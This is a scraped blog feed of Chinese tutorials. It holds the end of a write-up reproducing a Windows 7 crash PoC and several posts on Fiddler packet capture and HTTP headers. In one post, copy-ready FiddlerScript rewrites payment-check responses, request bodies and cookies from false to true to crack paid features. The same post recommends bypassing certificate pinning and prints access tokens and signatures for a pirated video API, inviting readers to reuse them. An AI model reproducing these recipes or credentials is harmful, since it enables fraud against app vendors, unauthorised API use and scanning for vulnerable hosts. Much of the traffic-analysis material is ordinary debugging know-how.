验证机中克隆POC,开始验证："></a>5.2 Clone the PoC on the testing machine and start verification:</h5><p><img src="https://i.bmp.ovh/imgs/2019/06/b1374b7e4c2e013d.png" alt></p><h5 id="5-3-靶机windows7-蓝屏重启："><a 
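href="#5-3-靶机windows7-蓝屏重启：" class="headerlink" title="5.3 靶机windows7 蓝屏重启："></a>5.3 The Windows 7 target blue-screens and reboots:</h5><p><img src="https://i.bmp.ovh/imgs/2019/06/53a110f293d74507.png" alt></p><h4 id="6-总结与延伸："><a href="#6-总结与延伸：" class="headerlink" title="6.总结与延伸："></a>6. Summary and next steps:</h4><p>Many PoCs are available for verification. Since the goal here was only to reproduce the vulnerability, I used the most direct one and kept these notes brief. As a follow-up, APIs such as Shodan and ZoomEye could be combined to automate information gathering and detection for targets that show signs of the vulnerability.</p>]]></content>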
      
      
      
    </entry>
    
    
    
    <entry>
      <title>[Fiddler Does Anything, Part 4] Capturing Live Stream Sources and Analyzing Interfaces</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-four/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-four/</url>
      
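        <content type="html"><![CDATA[<ul><li><p>Today's tutorial shows how to do "packet reverse engineering": jumping to keywords and analyzing interfaces. (Feels a lot like OllyDbg (OD), doesn't it?)<br>We use [Migu Video] as the example; the logic is the same for other apps, so the approach is general.<br>First, some preparation. (These tools are used for capturing traffic from any app, so certificate-protected traffic is no longer an excuse.)<br>1. An Android emulator, rooted (the MuMu emulator is recommended). A real Android phone works too, of course.<br>2. Install the Xposed framework (it adapts automatically on an emulator). Link: <a href="https://pan.baidu.com/s/1YfLpVQb1QophNO38alNdug" target="_blank" rel="noopener">https://pan.baidu.com/s/1YfLpVQb1QophNO38alNdug</a> Extraction code: 5m98<br>3. Install https HOST (an Xposed module). Link: <a href="https://pan.baidu.com/s/1PFidSyoAtHynxNPF4t-voA" target="_blank" rel="noopener">https://pan.baidu.com/s/1PFidSyoAtHynxNPF4t-voA</a> Extraction code: 0f2d<br>This preparation is mandatory; without it, many packets cannot be captured.<br>I will skip how to set up Fiddler (FD) as a Wi-Fi proxy, since there are plenty of guides online, and go straight to the demonstration.<br>Step 1:<br>Open Migu Video, find the program you want to capture, and check whether any data shows up in FD. [I use CCTV1 as the example here.]<br><img src="https://attach.52pojie.cn/forum/201902/12/111630rlmlqowxl2luxzqw.png" alt="img"></p><p><img src="https://attach.52pojie.cn/forum/201902/12/111710y5nasnq48y8xkwwq.png" alt="img"><br>If FD shows data, the setup is correct and you can move on to the next step.<br>Step 2:<br>Open CCTV1 normally, then look at the data in FD.<br><img src="https://attach.52pojie.cn/forum/201902/12/111905raeqtq7e6f4co4qe.png" alt="img"></p><p><img src="https://attach.52pojie.cn/forum/201902/12/111906lvckovfec0e2dl2f.png" alt="img"><br>Step 3:<br>Filter the captured packets and decode them all into readable data.<br><img src="https://attach.52pojie.cn/forum/201902/12/112204dpmrlssbhpbhqq4x.png" alt="img"><br>Step 4:<br>Search by keyword, much like the PUSH trick in OD. The keyword for live stream sources is [m3u8]. We first need to find out whether Migu Video's program source is in m3u8 format, so search for: m3u8. A session highlighted in yellow contains m3u8, so that is the packet to look at.<br><img src="https://attach.52pojie.cn/forum/201902/12/112524yiqqjcjt0qjqggmp.png" alt="img"><br>Step 5:<br>Analyze the packet. A response with this much data is usually JSON, so click the JSON tab.<br><img src="https://attach.52pojie.cn/forum/201902/12/112937n16cetee36ewngwg.png" alt="img"><br>The JSON clearly shows that the domain play.miguvideo.com returned an m3u8 address.<br>url=<a 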
href="http://gslbmgsplive.miguvideo.com/wd_r2/cctv/cctv1/600/index.m3u8?msisdn=10b1efdfd58919f4ccf07b3987d39131&amp;mdspid=&amp;spid=699004&amp;netType=4&amp;sid=2200291011&amp;pid=2028597139&amp;timestamp=20190212113218&amp;Channel_ID=25000502-99000-200300080100005&amp;ParentNodeID=-99&amp;assertID=2200291011&amp;client_ip=125.123.158.154&amp;SecurityKey=20190212113218&amp;imei=008796753773920&amp;promotionId=&amp;mvid=&amp;mcid=&amp;mpid=&amp;encrypt=4b4a040bf73d40d80a8974fdc095d593" target="_blank" rel="noopener">http://gslbmgsplive.miguvideo.com/wd_r2/cctv/cctv1/600/index.m3u8?msisdn=10b1efdfd58919f4ccf07b3987d39131&amp;mdspid=&amp;spid=699004&amp;netType=4&amp;sid=2200291011&amp;pid=2028597139&amp;timestamp=20190212113218&amp;Channel_ID=25000502-99000-200300080100005&amp;ParentNodeID=-99&amp;assertID=2200291011&amp;client_ip=125.123.158.154&amp;SecurityKey=20190212113218&amp;imei=008796753773920&amp;promotionId=&amp;mvid=&amp;mcid=&amp;mpid=&amp;encrypt=4b4a040bf73d40d80a8974fdc095d593</a><br>As you can see, this m3u8 URL carries many parameters, including our IP address.<br><img src="https://attach.52pojie.cn/forum/201902/12/113051dogmflkvvqqbxafv.png" alt="img"><br>Step 6:<br>Try the URL in a player such as VLC. If it plays, the playback address is correct, which means play.miguvideo.com is the interface that returns playback addresses.<br><img src="https://attach.52pojie.cn/forum/201902/12/113430z21rrhr7x4418r4h.png" alt="img"><br>Step 7: capture the interface for any channel.<br>In FD's command box, type: bpafter play.miguvideo.com<br><img src="https://attach.52pojie.cn/forum/201902/12/114232x1vvgb1adll92znl.png" alt="img"><br>Then press Enter.<br><img src="https://attach.52pojie.cn/forum/201902/12/114232su6uooiiz2o5mjo6.png" alt="img"><br>Step 8:<br>Tap any channel, and FD breaks automatically so you can read the playback address. It is very easy to spot.<br><img src="https://attach.52pojie.cn/forum/201902/12/114406wag1ewrxgxrzmq9g.png" alt="img"></p></li></ul>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>[Fiddler Does Anything, Part 3] Essential Knowledge for Packet Reverse Engineering</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-three/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-three/</url>
      
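        <content type="html"><![CDATA[<ul><li><blockquote><blockquote><blockquote><p>Student A: What is there to learn about packet capture? You just use a tool and set a Wi-Fi proxy, and there is still a lot you can't do with it. Better to learn Android reverse engineering.<br> Scientist didi: Sorry, but with packet capture you can do anything you like.</p></blockquote><p>Learning packet capture follows exactly the same logic as learning OllyDbg (OD), especially for packet reverse engineering. To use OD you need to know what instructions such as jmp mean, and packet capture works the same way.</p></blockquote><p>I. Meaning of the session fields</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/135039covgodhuu3o88boo.png" alt="img">     </p><p>The figure shows Fiddler's overall interface. So what do these fields mean? Here is a rundown:</p><p>Result: the HTTP status code　　　　　　</p><p>Protocol: the protocol used by the request, such as HTTP/HTTPS/FTP</p><p>HOST: the host name or domain name of the requested address</p><p>URL: the location of the requested resource</p><p>Body: the size of the response body in bytes</p><p>Caching: the response's cache expiry time or Cache-Control value</p><p>Content-Type: the content type of the response</p><p>Process: the local process that sent the request (name and ID)</p><p>Comments: notes </p><p>Custom: a user-defined value</p><p>II. The Request area</p><p>The Request area is shown in the figure:</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/135450gqpqw51wm2rarnaw.png" alt="img">     </p><p>So what does each piece of data mean?</p><p>Request method: GET/POST, etc. </p><p>Protocol: HTTP/1.1 (usually this)</p><p>1. Cache headers</p><p>　　If-Modified-Since: makes the request conditional; carries the last-modified time of the cached copy so the server can answer 304 if nothing has changed</p><p>　　If-None-Match: can improve performance (the Response includes an ETag; when the client requests the resource again, the Request includes If-None-Match with the ETag value; the server checks the ETag and returns status code 304 if it is unchanged or 200 if it has changed)</p><p>　　Pragma: prevents the page from being cached (Pragma: no-cache, a legacy HTTP/1.0 header)</p><p>　　Cache-Control: the caching policy that requests and responses follow</p><p>　　public: may be stored by any cache</p><p>　　private: may be stored only in a private cache</p><p>　　no-cache: a cached copy must be revalidated with the server before it is used (no-store is the directive that forbids caching altogether)</p><p>2. Client headers</p><p>　　User-Agent: tells the server the name and version of the client's operating system and browser</p><p>　　Accept: the media and file types the browser can accept</p><p>　　Accept-Encoding: whether compression is supported and which methods (gzip, deflate)</p><p>　　Accept-Language: the languages the browser declares it accepts</p><p>　　Accept-Charset: the character sets the browser declares it accepts, such as gb2312 or UTF-8</p><p>3. Cookies headers</p><p>　　Some requests send cookies and some do not.</p><p>　　Purpose: to send cookie values to the server</p><p> 4. Entity headers</p><p>　　Content-Length: the length of the data sent to the HTTP server</p><p>　　Content-Type: determines in what form and with what encoding the recipient reads the body</p><p>5. Security headers:</p><p>　　Upgrade-Insecure-Requests: 1 (sent by the browser by default; signals that the client prefers HTTPS responses)</p><p>6. 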
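Transport headers:</p><p>　　Host: required when sending a request. It specifies the Internet host and port number of the requested resource and is usually extracted from the HTTP URL</p><p>　　Proxy-Connection:  whether the TCP connection used to carry HTTP data between client and server is closed once the page has loaded. keep-alive means it stays open, and the client reuses the established connection when it visits pages on the same server again; close means it is closed, and the client has to open a new connection for the next visit.</p><p>　　Connection: keep-alive            the TCP connection is not closed</p><p>　　Connection: close                     the TCP connection is closed after one Request completes</p><p>7. Miscellaneous headers</p><p>　　Referer: provides context for the Request by telling the server which link the client came from</p><p>　　A -&gt; B (B's server can use Referer to count how many users arrived from A)</p><p>III. Response</p><p>The Response is shown in the figure:</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/135912nv971av7gz7zhz87.png" alt="img">     </p><p>1. Cache headers</p><p>　　Date: the exact date and time the message was generated</p><p>　　Expires: the browser uses its local cache until the specified expiry time</p><p>2. Cookie/Login headers</p><p>　　P3P: used for setting cookies across domains; can solve the problem of cross-domain cookie access in iframes</p><p>　　Set-Cookie: an important header that sends a cookie to the client browser; each cookie written produces one Set-Cookie header</p><p>3. Entity headers</p><p>　　ETag: used together with If-None-Match</p><p>　　Last-Modified: the date and time the resource was last modified</p><p>　　Content-Type: the web server tells the browser the type and character set of the response body</p><p>　　Content-Length: the length of the entity body, given as a decimal number of bytes. To send it, the server has to buffer the whole body first so that its size is known, and then sends all the data to the client together</p><p>　　Content-Encoding: the web server states which compression method (gzip, deflate) it used on the response body</p><p>　　Content-Language: the server tells the browser the language of the response body</p><p>4. Miscellaneous headers</p><p>　　Server: the HTTP server software</p><p>　　X-Powered-By: the technology the site was built with</p><p>　　X-AspNet-Version: if the site was built with ASP.NET, this header gives the ASP.NET version</p><p>5. Transport headers</p><p>　　Connection: keep-alive            the TCP connection is not closed</p><p>　　Connection: close                     the TCP connection is closed after one Request completes</p><p>6. Location header</p><p>　　Location: redirects to a new location; contains the new URL</p><p>IV. The HTTP authentication process</p><p>　　1. The client sends an HTTP Request to the server;</p><p>　　2. If the Request contains no Authorization header, the server returns a 401 error to the client and adds information in the "WWW-Authenticate" header of the Response;</p><p>　　3. The client Base64-encodes the username and password (an encoding, not encryption) and sends them to the server in the Authorization header;</p><p>　　4. 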
服务器将Authorization header中的用户名和密码去除，进行验证。如果验证通过，将根据请求发送资源给客户端；</p><p>　　HTTP OAuth认证：OAuth对于http来说，就是放在Authorization header中的不是用户名密码，而是一个token（令牌）。</p><p>　　客户端的使用：客户端若要跟“使用基本认证的网站”进行交互，将用户名密码加载Authorization header中即可。</p><p>五、Fiddler常见图标的含义</p><p>   <img src="https://attach.52pojie.cn/forum/201901/28/140158gnv8bl6hlo7uul3v.png" alt="img">     </p></blockquote></li></ul>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Capturing traffic from mobile apps with Fiddler</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler/</url>
      
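        <content type="html"><![CDATA[<ul><li><h3 id="用fiddler对手机上的程序进行抓包，网上有很多的资料，这里写一下来进行备用。"><a href="#用fiddler对手机上的程序进行抓包，网上有很多的资料，这里写一下来进行备用。" class="headerlink" title="用fiddler对手机上的程序进行抓包，网上有很多的资料，这里写一下来进行备用。"></a>There is plenty of material online about capturing mobile app traffic with Fiddler; these notes are kept here for future reference.</h3></li></ul><h4 id="前提："><a href="#前提：" class="headerlink" title="前提："></a><strong>Prerequisites:</strong></h4><p>  1. The computer running Fiddler and the phone must be on the same Wi-Fi network.</p><p>  Note: on a desktop PC, a portable Wi-Fi dongle can be installed to put the desktop and the phone on the same Wi-Fi network.</p><p>  2. Alternatively, an Android emulator on the computer can be used.</p><h4 id="安装配置步骤："><a href="#安装配置步骤：" class="headerlink" title="安装配置步骤："></a><strong>Installation and configuration steps:</strong></h4><h5 id="1-下载一个fiddler，网上随便下一个就可以了"><a href="#1-下载一个fiddler，网上随便下一个就可以了" class="headerlink" title="1.下载一个fiddler，网上随便下一个就可以了"></a>1. Download Fiddler; any copy available online will do</h5><h5 id="2-配置fiddler"><a href="#2-配置fiddler" class="headerlink" title="2.配置fiddler"></a>2. Configure Fiddler</h5><p>  <strong>Tools-&gt;Fiddler Options-&gt;Connections</strong></p><p>  <strong><img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120716187-103213269.png" alt="img"></strong></p><p>  Notes: 1. "Fiddler listens on port" is the proxy port the phone uses to connect to Fiddler; the default, 8888, is fine.</p><p>  2. "Allow remote computers to connect" lets remote devices send requests through Fiddler and must be checked.</p><p>  <strong>Tools-&gt;Fiddler Options-&gt;HTTPS</strong></p><p>  <strong><img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120733937-1858884840.png" alt="img"></strong></p><p>  Note: check "Decrypt HTTPS traffic" to capture the phone's HTTPS requests. Capturing HTTPS also requires installing a certificate on the phone, as described below.</p><p>  [After changing these settings, Fiddler must be restarted for them to take effect.]</p><h5 id="3-手机上的配置"><a href="#3-手机上的配置" class="headerlink" title="3.手机上的配置"></a>3. Configure the phone</h5><p>  3.1 Install the Fiddler certificate</p><p>  In the phone's browser, open http://[computer IP address]:[port configured in Fiddler] to download and install the Fiddler certificate.</p><p>  [To find the computer's IP address, run ipconfig in cmd, or hover the mouse over "Online" in Fiddler.]</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120802296-757506898.png" alt="img"></p><p>  Taking the IP address shown above as an example, the phone only needs to open <a href="http://10.252.167.91:8888" target="_blank" rel="noopener">http://10.252.167.91:8888</a> to download and install the Fiddler certificate.</p><p>  3.2 Set the Wi-Fi proxy on the phone</p><p>  Connect to the same Wi-Fi network as the computer, edit that network's settings, and set the proxy manually: the proxy host name is the computer's IP address and the proxy port is the port configured in Fiddler. After saving, Fiddler will receive the requests sent from the phone.</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120829921-223800751.png" alt="img"></p><p>  That completes the configuration, and everything else works as usual. For example, requests can be filtered in Fiddler to show only those sent to a particular server; after configuring a filter, click Actions to apply it.</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120845093-525900958.png" alt="img"></p><p>  Testing often involves a test environment. Some companies use the same domain name for every environment and rely on different hosts entries, so the server IP address the domain resolves to determines which environment is used. On a PC it is easy to edit the local hosts file to switch between the test and production environments, but changing hosts on a phone is awkward. In that case, connect the phone through Fiddler and change the hosts file on the computer, and the phone will reach the test environment.</p><p>  Notes:</p><p>  1. Once the phone is configured to use the proxy, Fiddler must be running for the phone to get online. If Fiddler is closed, the phone loses network access until the proxy setting is removed.</p><p>  2. When Fiddler starts, it changes the system Internet proxy to 127.0.0.1 by default, and it restores the original proxy when it exits normally. If Fiddler exits abnormally (for example, if its process is killed), the proxy is not restored and has to be fixed by hand (restore the original proxy or disable the proxy).</p><p>  The Internet proxy is set as follows:</p><p>  <img src="https://images2015.cnblogs.com/blog/626983/201511/626983-20151126120853421-360569062.png" alt="img"></p>]]></content>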
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Fiddler大解析！抱歉，抓包抓得好真的可以为所欲为</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-one/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-one/</url>
      
        <content type="html"><![CDATA[<p>说起抓包，很多人以为就是用个工具，简简单单地抓一下就可以了。</p><p>在这里，我必须发一个教程，解析一下抓包神器——Fiddler。</p><p>Fiddler仅仅是一个抓包工具？不好意思，Fiddler用得好，真的可以为所欲为。</p><p>Fiddler的作者</p><ul><li>Fiddler 的作者是 Eric Lawrence 是个大师级的人物， 目前在微软总部西雅图工作。 他的博客是: <a href="http://www.ericlawrence.com/Eric/" target="_blank" rel="noopener">http://www.ericlawrence.com/Eric/</a></li><li>博客中能看到他的简历，以及一些生活照.</li></ul><p>Fiddler的介绍</p><ul><li>Fiddler是强大的抓包工具，它的原理是以web代{过}{滤}理服务器的形式进行工作的，使用的代{过}{滤}理地址是：127.0.0.1，端口默认为8888，我们也可以通过设置进行修改。</li><li>代{过}{滤}理就是在客户端和服务器之间设置一道关卡，客户端先将请求数据发送出去后，代{过}{滤}理服务器会将数据包进行拦截，代{过}{滤}理服务器再冒充客户端发送数据到服务器；同理，服务器将响应数据返回，代{过}{滤}理服务器也会将数据拦截，再返回给客户端。</li><li>Fiddler可以抓取支持http代{过}{滤}理的任意程序的数据包，如果要抓取https会话，要先安装证书。</li></ul><p>这两点，希望大家牢记。接下来，给大家介绍Fiddler超级强大的地方之一——Fiddler Script.</p><p> 论坛有很多Fiddler的使用教程，这里就不多说了。但是，却没有一个人说到最强大的脚本功能！</p><blockquote><p>Fiddler 包含了一个脚本文件可以自动修改Http Request 和Response.这样我们就不需要手动地下”断点”去修改了，实际上它是一个脚本文件CustomRules.js<br> 位于: C:\Documents and Settings[your user]\My  Documents\Fiddler2\Scripts\CustomRules.js 下，你也可以在Fiddler  中打开CustomRules.js 文件，  启动Fiddler, 点击菜单Rules-&gt;Customize Rules…<br> Fiddler Script 的官方帮助文档必须认真阅读， 地址是：<a href="http://www.fiddler2.com/Fiddler/dev/ScriptSamples.asp" target="_blank" rel="noopener">http://www.fiddler2.com/Fiddler/dev/ScriptSamples.asp</a></p></blockquote><p>小常识：Fiddler Script 是用JScript.NET语言写的</p><p>那么Fiddler Script到底有什么用？我这里来列举一些大家肯定遇到过的问题：</p><p>场景1：一个付费验证，是否付费会返回一个json。里面有一个时间戳和一个false。如果时间戳和客户端不一致，则为<a href="https://www.52pojie.cn" target="_blank" rel="noopener">破解</a>失败。</p><p>那么你一定会这么想，有没有一个功能，可以只替换json里面部分参数，然后返回给客户端，而不是全部写死呢？于是，我们需要使用到script了！代码如下：如一个json是这个内容，baidu.com，返回了一个【name:吾爱破解，付费:false】</p><blockquote><p> if (oSession.fullUrl.Contains(“<a href="http://www.baidu.com&quot;)" target="_blank" rel="noopener">http://www.baidu.com&quot;)</a>)<br>          {</p><pre><code>          // 获取Response Body、Request Body中JSON字符串，转换为可编辑的JSONObject变量          var responseStringOriginal =  
oSession.GetResponseBodyAsString();          var responseJSON = Fiddler.WebFormats.JSON.JsonDecode(responseStringOriginal);          var requestStringOriginal=oSession.GetRequestBodyAsString();          var requestJSON = Fiddler.WebFormats.JSON.JsonDecode(requestStringOriginal);          ){ //请求参数中，若type为1，对返回值做如下修改              responseJSON.JSONObject[&#39;付费&#39;] = &quot;true&quot;;              // 重新设置Response Body              var responseStringDestinal = Fiddler.WebFormats.JSON.JsonEncode(responseJSON.JSONObject);              oSession.utilSetResponseBody(responseStringDestinal);          }      }</code></pre><p>  }</p></blockquote><p> 通过以上代码，即可每次在baidu返回数据时，自动将付费改为true，从而达到了破解的效果。</p><p>场景2：我想要修改request的Body里面的部分参数，每次下完断点，修改完再提交，总会网络超时或者APP超时。这该怎么办？难道只能靠手速？</p><blockquote><p>​    if(oSession.uriContains(“<a href="http://www.baidu.com&quot;)" target="_blank" rel="noopener">http://www.baidu.com&quot;)</a>)<br>​     {<br>​         var strBody=oSession.GetRequestBodyAsString();// 获取Request 中的body字符串<br>​         strBody=strBody.replace(“false”,”true”);// 用正则表达式或者replace方法去修改string，将false改为true<br>​         FiddlerObject.alert(strBody);// 弹个对话框检查下修改后的body<br>​         oSession.utilSetRequestBody(strBody);// 将修改后的body，重新写回Request中<br>​     }</p></blockquote><p>场景3：我想要修改cookie，改成一个付费过的cookie，但是需要实时生成，不能靠手速。这该怎么办？</p><blockquote><p>  if  (oSession.HostnameIs(‘<a href="http://www.baidu.com&#39;" target="_blank" rel="noopener">www.baidu.com&#39;</a>) &amp;&amp;  oSession.uriContains(‘pagewithCookie’) &amp;&amp;  oSession.oRequest.headers.Contains(“Cookie”))<br>      {<br> var sCookie = oSession.oRequest[“Cookie”];<br>      //  用replace方法或者正则表达式的方法去操作cookie的string<br>      sCookie = sCookie.Replace(“付费=false”, “付费=true”);<br>      oSession.oRequest[“Cookie”] = sCookie; </p></blockquote><p>场景4：我想要知道他到底有没有请求具体哪个网址，用查找速度太慢了。过滤也很慢。</p><blockquote><p> if (oSession.HostnameIs(“<a href="http://www.baidu.com&quot;)" target="_blank" rel="noopener">www.baidu.com&quot;)</a>) 
{<br>             oSession[“ui-color”] = “red”;<br>         }</p></blockquote><p>场景5：我想要自动保存某个接口的数据到本地，怎么才能实现？</p><blockquote><p> if (oSession.fullUrl.Contains(“<a href="http://www.baidu.com/playurl/v1/&quot;" target="_blank" rel="noopener">www.baidu.com/playurl/v1/&quot;</a>) ){<br>                         oSession.utilDecodeResponse();//消除保存的请求可能存在乱码的情况<br>                         var fso;<br>                         var file;<br>                         fso = new ActiveXObject(“Scripting.FileSystemObject”);<br>                         //文件保存路径，可自定义<br>                         file = fso.OpenTextFile(“D:\Sessions.txt”,8 ,true, true);<br>                         //file.writeLine(“Response code: “ + oSession.responseCode);<br>                         file.writeLine(“Response body: “ + oSession.GetResponseBodyAsString());<br>                         file.writeLine(“\n”);<br>                         file.close();<br>                 } </p></blockquote><p> ——————————————————————————————————————————————————————————————————————</p><p> 以上就是Fiddler script经常使用到的功能，免费奉献给大家。直接复制即可使用。</p><p> Fiddler的脚本介绍到这里，那么，说到底Fiddler还是只能抓包啊，即使基于xpoesd能抓到https的包，还是发现有很多包抓不到啊！！！等等，本文还没完呢！</p><p> （</p><p><strong>接下来的内容，公布过后，会涉及到技术滥用，因此，仅公布原理。</strong></p><p>）</p><p> 首先来讲https，也就是安卓APP证书这一款，目前论坛上已经有不少的朋友发了相关的一些程序，大家可以去下载。</p><p> 如：</p><p><a href="https://www.52pojie.cn/thread-854170-1-1.html" target="_blank" rel="noopener">https://www.52pojie.cn/thread-854170-1-1.html</a></p><p> 但是，我个人比较倾向于just trust me这个插件，这是最全能的。just trust me是hook了安卓框架验证机制，更加棒~</p><p> ————————————————————————————————————————————————————————</p><p> 首先，大家抓包会遇到一个问题，为什么即使绕过了APP证书验证，为什么还是抓不到包！难道不是http协议？</p><p> 其实并不是，APP大多数还是走的http协议，那为什么抓不到优酷的视频？抓不到关键的访问——原因在于此，代{过}{滤}理！</p><blockquote><p>目前有非常多的APP，都为了防止被抓包，不仅仅是只用了https这么简单。而使用fiddler抓不到包，本质原因在于wifi代{过}{滤}理！很多APP会检测你是否用了wifi代{过}{滤}理，如果设置了，则APP无法正常使用。这样就会从根本上杜绝被抓包</p></blockquote><p> 那么，我们要怎么做才能防止这种情况的发生呢？</p><p> 比较笨的一种办法依旧是使用xposed上的just trust me，依旧hook相关函数，即可破解该策略。</p><p> 
—————————————————————————————————————————————————————————</p><p> 等等，我发现用了trust me过后，还是抓不到包，这到底是怎么回事！！！</p><p> 非常简单，他们就是利用了本地服务器中转，这样的话Fiddler是抓不了包的。比如著名APP：麻花影视、电视家</p><p> 那么，有没有办法能抓到这种操作的包呢？当然是有的。</p><p> 这边只能透露几点，不能正大光明地公布，否则大量非法分子就可以破解非常多的APP了。</p><blockquote><p>提示：Fiddler的本质其实就是代{过}{滤}理服务器，那么，如果是代{过}{滤}理服务器，所有的请求是不是都会走这台服务器呢？那是肯定的。</p></blockquote><p> ——————————————————————————————————————————————————————————</p><p> 最后，抓包除了破解APP以外，还有什么用？</p><p> 第一：抓接口，可以将所有的视频点播类APP都抓下来！</p><p> 如麻花视频：</p><p> ————————</p><blockquote><p>GET <a href="http://api.acgplusplus.com/api/app/video/ver2/user/clickPlayVideo_tv/7/1450?videoId=53913&amp;time=1547183436020" target="_blank" rel="noopener">http://api.acgplusplus.com/api/a … &amp;time=1547183436020</a> HTTP/1.1</p></blockquote><blockquote><p>Content-Type: application/json</p></blockquote><blockquote><p>Accept: application/json</p></blockquote><blockquote><p>accessToken: 936b8872c4f81b6537eaa80f4e2e78c7807cebbcb02548d8d4da1e55c61c6509</p></blockquote><blockquote><p>X-Client-NonceStr: FbWu9jFnpG</p></blockquote><blockquote><p>X-Client-IP: 127.0.0.1</p></blockquote><blockquote><p>X-Client-TimeStamp: 1543592259810</p></blockquote><blockquote><p>X-Client-Version: 1.1.1</p></blockquote><blockquote><p>X-Client-Sign: 61274de99728b3981041d657bec4528b416658cd651110f9cf950dd3fbc0b15f</p></blockquote><blockquote><p>X-Auth-Token: mb_token:25361603:1211f5511483be1def9af655c10ede12</p></blockquote><blockquote><p>X-Client-Token:</p></blockquote><blockquote><p>Host: api.acgplusplus.com</p></blockquote><blockquote><p>Connection: Keep-Alive</p></blockquote><blockquote><p>User-Agent: okhttp/3.10.0</p></blockquote><blockquote><p>Accept-Encoding: identity</p></blockquote><p> ——————————————————————————————————</p><p> 这个接口大家可以用用，永不失效的接口！返回出来的地址就是这样。（大家可以直接用，哈哈，本来麻花视频也是盗版的）</p><p> 再比如优酷的播放接口：</p><blockquote><p>GET <a href="https://ups.youku.com/ups/get.json?ckey=" target="_blank" rel="noopener">https://ups.youku.com/ups/get.json?ckey=</a>不公布，免得被盗用<br> 
User-Agent: Youku;7.5.0;Android;6.0.1;MuMu<br> Host: ups.youku.com<br> Connection: Keep-Alive<br> Accept-Encoding: gzip, deflate</p></blockquote><p> 这些接口，全都是永久有效的！</p><p> 拥有抓包技术，你就可以自己制作任何的视频APP，调用第三方的接口即可！！！</p><p> 另外楼主尝试过支付宝等相关APP，依旧能抓到部分的包。</p><p>#### </p>]]></content>
      
      
      <categories>
          
          <category> fiddler </category>
          
      </categories>
      
      
        <tags>
            
            <tag> fiddler </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>【Fiddler为所欲为第二篇】像OD一样调试</title>
      <link href="/Coderzgh.github.io/2019/06/02/fiddler-two/"/>
      <url>/Coderzgh.github.io/2019/06/02/fiddler-two/</url>
      
        <content type="html"><![CDATA[<ul><li><blockquote><p>导语：<br> 其实Fiddler隐藏的功能太多太多，其调试功能也是异常强大，可以说是抓包界的“<a href="https://www.52pojie.cn/thread-350397-1-1.html" target="_blank" rel="noopener">OllyDbg</a>”并不为过。接下来，教大家如何使用Fiddler进行调试、解析，甚至封包“逆向”！</p></blockquote></li></ul><p><strong>一、像OD一样定制菜单</strong></p><pre><code>   1.1定制rule菜单的子菜单</code></pre><blockquote><blockquote><blockquote><p>​    // 定义名为52pj的子菜单<br>​     RulesString(“&amp;52pj”, true);<br>​     // 生成52pj子菜单的radio选项<br>​     RulesStringValue(0,”安卓8.0”, “52pj&amp;狂暴补师亚丝娜&amp;k=52pj”)<br>​     RulesStringValue(1,”安卓9.0”, “52pj&amp;610100&amp;k=52pj”)<br>​     RulesStringValue(2,”安卓10.0”, “52pj&amp;didi科学家&amp;k=52pj”)<br>​     RulesStringValue(3,”安卓11.0”, “52pj&amp;CrazyNut&amp;k=52pj”)<br>​     RulesStringValue(4,”&amp;Custom…”, “%CUSTOM%”)<br>​     public static var s52pj: String = null;</p></blockquote><blockquote><p>}</p></blockquote></blockquote><p>还需要在OnBeforeRequest函数中加入：</p></blockquote><blockquote><p>   if (null != s52pj) {<br>      oSession.oRequest[“52pj”] = s52pj; </p></blockquote><pre><code> ![img](https://attach.52pojie.cn/forum/201901/25/122553e3cqsscluu81cd8q.png)     </code></pre><p>   效果图：<br>      <img src="https://attach.52pojie.cn/forum/201901/25/122449x5588avmamylllcv.png" alt="img">     </p><p>   1.2定制tool菜单的子菜单</p><blockquote><blockquote><blockquote><p>public static ToolsAction(“我是子菜单”)<br> function DoManualYules(){</p></blockquote><p>//子菜单的功能<br>      FiddlerObject.alert(“我是子菜单”); // 根据需要定制<br> }</p></blockquote></blockquote><pre><code> ![img](https://attach.52pojie.cn/forum/201901/25/122803pn9gan9rnfvgcf1n.png)     </code></pre><p>   1.3定制右键菜单</p><blockquote><p> public static ContextAction(“我是右键菜单”)<br>  function DoOpenInIE(oSessions: Fiddler.Session[]){<br>      FiddlerObject.alert(“我是右键菜单”); // 根据需要定制<br>  }</p></blockquote><p>   右键菜单不好截图，就不截图啦~~~~<br>   子菜单和右键菜单自己新建一个类就OK了。</p><p>   <strong>二、限速</strong><br>   fiddler提供了一个功能，让我们模拟低速网路环境。启用方法如下：Rules  → Performances → Simulate 
